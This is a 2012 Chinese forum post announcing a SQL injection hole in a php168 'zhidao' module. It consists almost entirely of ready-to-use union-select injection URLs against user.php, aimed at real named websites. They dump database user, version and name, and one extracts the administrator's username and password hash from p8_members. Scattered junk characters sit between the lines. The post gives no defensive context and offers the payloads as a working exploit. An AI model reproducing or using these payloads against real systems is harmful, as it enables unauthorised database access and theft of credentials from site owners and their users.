找回密码
 立即注册
查看: 3590|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
5 a* ?1 B$ f# s5 o) m! o/ D1 H                                                         
6 n; h0 h% G) y( j% E. _6 i8 u                                       6 s$ P  ?& n" p1 C& G! F: H8 z

9 O  i% F6 R, e) I0 l4 q, }4 u, g
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--, N0 c3 U' x# k( s. B
                                                     
, }; k7 O- q0 Z8 O& K& W                                                                  
9 C4 n5 c$ k) g% d                                                        5 R; O! p* ?8 e; g4 z3 a
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
9 G# g$ s* _: t3 s0 U& j' Q. [( P: d( A9 n/ J/ Q6 g$ ?) M
, i8 x+ `( Z! K4 Q2 D

; p7 V! x7 ~/ _. \+ E: N                                                            * h) M( M& W( y: R
) x3 _7 k4 i& N1 ^8 C4 E
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
( E7 A) ~  I' D9 Z+ b( p& z5 m: T# v* N( w# s, B
; x* S/ m' m% j- {4 Z
' M" c8 t' n4 P( e
                                                                    - l! G! V4 \; ?; z! S8 K" ?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表